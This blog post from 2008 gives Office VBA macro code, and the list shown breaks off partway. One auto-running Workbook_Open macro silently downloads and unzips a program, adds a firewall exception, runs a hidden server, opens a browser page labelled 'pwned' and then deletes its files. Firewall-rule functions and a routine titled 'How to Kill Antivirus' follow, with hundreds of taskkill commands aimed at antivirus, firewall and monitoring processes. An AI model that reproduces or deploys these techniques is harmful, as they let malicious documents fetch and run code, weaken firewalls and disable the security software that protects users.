Sunday, November 16, 2008
< PRE > tags suck.
Modifying Windows Firewall Rules from VBA
Function Add_App_To_Firewall(program_name, program_executable, program_scope)
Const NET_FW_PROFILE_DOMAIN = 0
Const NET_FW_PROFILE_STANDARD = 1
Const NET_FW_SCOPE_ALL_NAME = "All subnets"
Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"
Const NET_FW_IP_VERSION_ANY = 2
' Create the firewall manager object.
Dim fwMgr
Set fwMgr = CreateObject("HNetCfg.FwMgr")
' Get the current profile for the local firewall policy.
Dim profile
Set profile = fwMgr.LocalPolicy.CurrentProfile
Dim app
Set app = CreateObject("HNetCfg.FwAuthorizedApplication")
app.ProcessImageFileName = program_executable
app.Name = program_name
app.Scope = program_scope
app.IpVersion = NET_FW_IP_VERSION_ANY
app.Enabled = True
On Error Resume Next
profile.AuthorizedApplications.Add app
End Function
Function Remove_App_From_Firewall(program_executable)
On Error Resume Next
' Create the firewall manager object.
Dim fwMgr
Set fwMgr = CreateObject("HNetCfg.FwMgr")
' Get the current profile for the firewall
Dim fwPolicy
Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile
' Get the Auth Applications object so we can modify
Dim colApplications
Set colApplications = fwPolicy.AuthorizedApplications
colApplications.Remove program_executable
End Function
As an example, here's the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.
Sub Workbook_Open()
'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2
Add_App_To_Firewall "tiny-local", Environ("TEMP") & "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET
Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT
Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT
' "Sleep" for a couple of seconds to allow tiny.exe to load
Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT
Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT
Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT
Remove_App_From_Firewall Environ("TEMP") & "\tiny.exe"
On Error Resume Next
Kill Environ("TEMP") & "\tinyweb.zip"
Kill Environ("TEMP") & "\SRC.zip"
Kill Environ("TEMP") & "\LICENSE.txt"
Kill Environ("TEMP") & "\File_id.diz"
Kill Environ("TEMP") & "\Readme.txt"
Kill Environ("TEMP") & "\Cgitest.zip"
Kill Environ("TEMP") & "\index.html"
Kill Environ("TEMP") & "\tiny.exe"
End Sub
How to Kill Antivirus from Word or Excel VBA
Function Build_Cmd_List(arrayCmds, command)
If arrayCmds(0) <> "" Then
ReDim Preserve arrayCmds(UBound(arrayCmds) + 1) As String
End If
arrayCmds(UBound(arrayCmds)) = command
End Function
Function Kill_AV()
Dim arrayCmds() As String
ReDim arrayCmds(0) As String
On Error Resume Next
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""antivirus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ants.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apimonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aplica32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apvxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""arr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atcon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atro55en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""au.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""auto-protect.nav80try.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autodown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autotrace.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autoupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avconsol.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ave32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgcc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-agnt95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icload95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pccwin98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""serv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkpop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkwctl9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avltmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsynmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwinnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitor9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitornt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""backweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bargains.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bd_professional.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""beagle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""belt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidef.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcpevalsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bisp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blss.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootconf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootwarn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""borg2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""brasil.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bs120.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bundle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bvt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccevtmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccpxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cdp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfgwiz.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""clean.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleanpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""click.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmesys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmgrdian.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmon016.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""connectionmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpf9x206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpfnt206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwnb181.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwntdwmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""datemanager.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dcomx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defalert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defscangui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""deputy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""divx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllcache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllreg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""doors.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpps2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwatson.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drweb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwebupw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dssagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""efpeadm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""emsw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanhnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ethereal.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""etrustcipe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""evpn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exantivirus-cnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exe.avxw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""expert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""explore.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fameh32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fch32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fih32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""firewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fnrb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win_trial.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsaa.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530stbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530wtbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsgk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsm32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsma32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsmb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gator.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbmenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbpoll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""generics.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guarddog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hacktracersetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbinst.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotactio.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hwpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxdl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxiul.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamstats.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""idle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedriver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iexplorer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ifw2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""inetlnfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""init.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intdel.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intren.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""istsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jammer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jdbgmrg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavlite40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpers40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kazza.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""keenvalue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-pf-213-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrl-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrp-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kernel32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""killprocesssetup161.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""launcher.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldnetmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpromenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lnetinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""loader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""localnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lordpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luau.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lucomserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luinit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luspt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mapisvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcmnhdlr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcshield.exe"""
